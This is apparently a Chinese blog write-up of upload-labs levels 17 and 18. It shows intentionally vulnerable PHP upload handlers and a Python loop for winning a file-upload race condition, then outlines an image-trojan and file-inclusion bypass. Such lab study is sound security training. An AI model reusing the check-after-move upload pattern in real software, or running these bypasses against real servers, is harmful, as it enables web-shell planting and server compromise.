• upload-labs第十七十八关

    第十七关

    1. $is_upload = false;
    2. $msg = null;
    3.  
    4. if(isset($_POST['submit'])){
    5.     $ext_arr = array('jpg','png','gif');
    6.     $file_name = $_FILES['upload_file']['name'];
    7.     $temp_file = $_FILES['upload_file']['tmp_name'];
    8.     $file_ext = substr($file_name,strrpos($file_name,".")+1);
    9.     $upload_file = UPLOAD_PATH . '/' . $file_name;
    10.  
    11.     if(move_uploaded_file($temp_file, $upload_file)){
    12.         if(in_array($file_ext,$ext_arr)){
    13.              $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
    14.              rename($upload_file, $img_path);
    15.              $is_upload = true;
    16.         }else{
    17.             $msg = "只允许上传.jpg|.png|.gif类型文件!";
    18.             unlink($upload_file);
    19.         }
    20.     }else{
    21.         $msg = '上传出错!';
    22.     }
    23. }

    由于这个是先上传在判断我们就可以使用木马让木马写文件

    我们只需要不停的上传然后自己不停的访问

    1. import requests
    2. url = 'http://127.0.0.1/upload/upload/1.php'
    3. while True:
    4.     print('running')
    5.     html = requests.get(url)
    6.     if html.status_code == 200:
    7.         print('ok')
    8.         break

    先运行py脚本再上传(或者直接脚本上传),记得上传的时候抓一个包

    这个是无限发送包

    访问成功

    上传完成

    第十八关

    1. //index.php
    2. $is_upload = false;
    3. $msg = null;
    4. if (isset($_POST['submit']))
    5. {
    6.     require_once("./myupload.php");
    7.     $imgFileName =time();
    8.     $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    9.     $status_code = $u->upload(UPLOAD_PATH);
    10.     switch ($status_code) {
    11.         case 1:
    12.             $is_upload = true;
    13.             $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
    14.             break;
    15.         case 2:
    16.             $msg = '文件已经被上传,但没有重命名。';
    17.             break; 
    18.         case -1:
    19.             $msg = '这个文件不能上传到服务器的临时文件存储目录。';
    20.             break; 
    21.         case -2:
    22.             $msg = '上传失败,上传目录不可写。';
    23.             break; 
    24.         case -3:
    25.             $msg = '上传失败,无法上传该类型文件。';
    26.             break; 
    27.         case -4:
    28.             $msg = '上传失败,上传的文件过大。';
    29.             break; 
    30.         case -5:
    31.             $msg = '上传失败,服务器已经存在相同名称文件。';
    32.             break; 
    33.         case -6:
    34.             $msg = '文件无法上传,文件不能复制到目标目录。';
    35.             break;      
    36.         default:
    37.             $msg = '未知错误!';
    38.             break;
    39.     }
    40. }
    41.  
    42. //myupload.php
    43. class MyUpload{
    44. ......
    45. ......
    46. ...... 
    47.   var $cls_arr_ext_accepted = array(
    48.       ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
    49.       ".html", ".xml", ".tiff", ".jpeg", ".png" );
    50.  
    51. ......
    52. ......
    53. ......  
    54.   /** upload()
    55.    **
    56.    ** Method to upload the file.
    57.    ** This is the only method to call outside the class.
    58.    ** @para String name of directory we upload to
    59.    ** @returns void
    60.   **/
    61.   function upload( $dir ){
    62.     
    63.     $ret = $this->isUploadedFile();
    64.     
    65.     if( $ret != 1 ){
    66.       return $this->resultUpload( $ret );
    67.     }
    68.  
    69.     $ret = $this->setDir( $dir );
    70.     if( $ret != 1 ){
    71.       return $this->resultUpload( $ret );
    72.     }
    73.  
    74.     $ret = $this->checkExtension();
    75.     if( $ret != 1 ){
    76.       return $this->resultUpload( $ret );
    77.     }
    78.  
    79.     $ret = $this->checkSize();
    80.     if( $ret != 1 ){
    81.       return $this->resultUpload( $ret );    
    82.     }
    83.     
    84.     // if flag to check if the file exists is set to 1
    85.     
    86.     if( $this->cls_file_exists == 1 ){
    87.       
    88.       $ret = $this->checkFileExists();
    89.       if( $ret != 1 ){
    90.         return $this->resultUpload( $ret );    
    91.       }
    92.     }
    93.  
    94.     // if we are here, we are ready to move the file to destination
    95.  
    96.     $ret = $this->move();
    97.     if( $ret != 1 ){
    98.       return $this->resultUpload( $ret );    
    99.     }
    100.  
    101.     // check if we need to rename the file
    102.  
    103.     if( $this->cls_rename_file == 1 ){
    104.       $ret = $this->renameFile();
    105.       if( $ret != 1 ){
    106.         return $this->resultUpload( $ret );    
    107.       }
    108.     }
    109.     
    110.     // if we are here, everything worked as planned :)
    111.  
    112.     return $this->resultUpload( "SUCCESS" );
    113.   
    114.   }
    115. ......
    116. ......
    117. ...... 
    118. };

    这一关有点麻烦,由于过滤无法上传php文件只能做图片马

    可以直接修改后缀

    我们需要一个网页写一个文件包含的漏洞

    解析完成

    成功

  • 相关阅读:
    深度学习之基于Pytorch和OCR的识别文本检测系统
    【Matlab】二维绘图函数汇总
    【计算机组成原理笔记】总线
    奥迪AUDI EDI INVOIC发票报文详解
    kotlin修饰符const的含义
    基于java+springboot+mybatis+vue+elementui的高铁订票管理系统
    我的家乡潍坊HTML静态网页 学生个人网页设计作品 学生家乡网页模板 简单个人主页成品
    计算机二级C语言经典资料汇总
    如何使用界面控件Telerik UI for WinForms开发步骤进度条?
    vue中使用echarts实现X轴动态时间(天)的折线图表
  • 原文地址:https://blog.csdn.net/m0_73248913/article/details/137956128